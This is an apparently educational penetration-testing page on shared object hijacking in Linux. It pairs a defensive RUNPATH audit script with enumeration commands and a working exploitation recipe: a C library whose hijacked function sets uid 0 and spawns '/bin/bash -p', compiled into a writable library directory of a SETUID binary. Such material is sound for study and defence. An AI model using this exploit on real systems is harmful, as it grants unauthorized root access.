Shared Object Hijacking
Shared Object Hijacking is an attack in which a malicious shared library is planted in a non-standard location from which a program loads its shared libraries.
If a program uses a custom library from such a location, or relies on libraries that can otherwise be replaced, the attacker can hijack it to run code with the program's privileges and escalate.
Key Concepts:
- SETUID Binaries: Programs with the SETUID bit set run with the privileges of the file owner (often root), so a library hijacked into such a program executes as that user and enables privilege escalation.
- LD_LIBRARY_PATH / RUNPATH: LD_LIBRARY_PATH is an environment variable, while RUNPATH and RPATH are entries embedded in the ELF binary itself; all of them tell the dynamic loader where to search for shared libraries. If any of those directories is writable by an unprivileged user, the libraries loaded from it can be hijacked. Note that the loader ignores LD_LIBRARY_PATH for SETUID binaries, so an embedded RUNPATH/RPATH pointing at a writable directory is the case that matters here.
Enumeration
# Find SETUID binaries on the system
find / -type f -perm -4000 2>/dev/null
# List the shared libraries used by the binary
ldd employee_manager ## here 'employee_manager' is the binary name
## Use readelf to inspect the binary's RUNPATH or RPATH.
# This shows whether a non-standard folder is used to load libraries.
readelf -d employee_manager | grep PATH
# If the output lists a custom path (here /custom/libs), check whether that directory is writable
ls -la /custom/libs/
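The readelf and ls checks above can be folded into a single audit script that reports every RPATH/RUNPATH search directory of a binary that is world-writable or missing. This is an added example written for this page, not code from the original notes; it assumes GNU readelf and GNU stat are available.

```shell
#!/bin/sh
# Audit helper (added example): report RPATH/RUNPATH search directories of a
# binary that are world-writable or missing, i.e. hijackable locations.
# Assumes GNU binutils (readelf) and GNU coreutils (stat -c).

# Read `readelf -d` output on stdin and print each RPATH/RUNPATH directory.
# Matching lines look like:  0x1d (RUNPATH)  Library runpath: [/custom/libs:/usr/lib]
extract_runpath_dirs() {
    sed -n 's/.*(R\(UN\)\{0,1\}PATH).*\[\(.*\)\].*/\2/p' | tr ':' '\n' | sed '/^$/d'
}

# Classify one directory: WRITABLE (others have write permission), missing
# (does not exist, so whoever controls the parent could create it), or ok.
classify_dir() {
    dir=$1
    if [ ! -d "$dir" ]; then
        echo "missing $dir"
        return
    fi
    mode=$(stat -c %a "$dir")
    case $mode in
        *[2367]) echo "WRITABLE $dir" ;;   # last octal digit carries the o+w bit
        *)       echo "ok $dir" ;;
    esac
}

# Run the check against a binary, resolving $ORIGIN the way the loader does
# (to the directory that contains the binary).
audit_binary() {
    bin=$1
    origin=$(cd "$(dirname "$bin")" && pwd)
    readelf -d "$bin" 2>/dev/null | extract_runpath_dirs | while IFS= read -r dir; do
        classify_dir "$(printf '%s\n' "$dir" | sed "s|[\$]ORIGIN|$origin|g")"
    done
}

# Usage: sh audit_runpath.sh /path/to/setuid/binary ...
for bin in "$@"; do
    echo "== $bin"
    audit_binary "$bin"
done
```

Feeding it the SETUID list from the find command above gives a quick inventory of binaries whose embedded search path points somewhere an unprivileged user can write.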
Exploitation
## If that directory is writable, we can create and inject a malicious shared object to escalate privileges.
## First, we need to identify the function that the binary calls from the
## shared library (e.g., apicall).
## To identify the function name, we can create a fake libshared.so that does not define
## the expected function and compile it as a .so file like below; running the binary then
## fails with a "symbol lookup error: undefined symbol: <name>" message that reveals the name:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Placeholder library: it deliberately lacks the function the binary expects,
 * so the dynamic loader reports the missing symbol's name at run time. */
void invalidFunction() {
    printf("R3zy/D3v\n");
}
```
## Compile it using the following:
gcc fake.c -fPIC -shared -o /custom/libs/libshared.so
## Once we know the valid function name, we can write src.c defining a function with that
## name that spawns a root shell, like below:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hijacked implementation of the function the SETUID binary imports from libshared.so. */
void apicall() {
    printf("Root Shell Summoned! Yay\n");
    setuid(0);               // Set the real user ID to root (the binary runs with euid 0)
    system("/bin/bash -p");  // Spawn a shell; -p keeps bash from dropping the privileges
}
```
# Compile the malicious C code into a shared object (.so).
gcc src.c -fPIC -shared -o /custom/libs/libshared.so
## Now that the malicious library is in place, run the vulnerable binary
## (employee_manager). The binary loads the hijacked library from its RUNPATH and
## executes the malicious apicall function.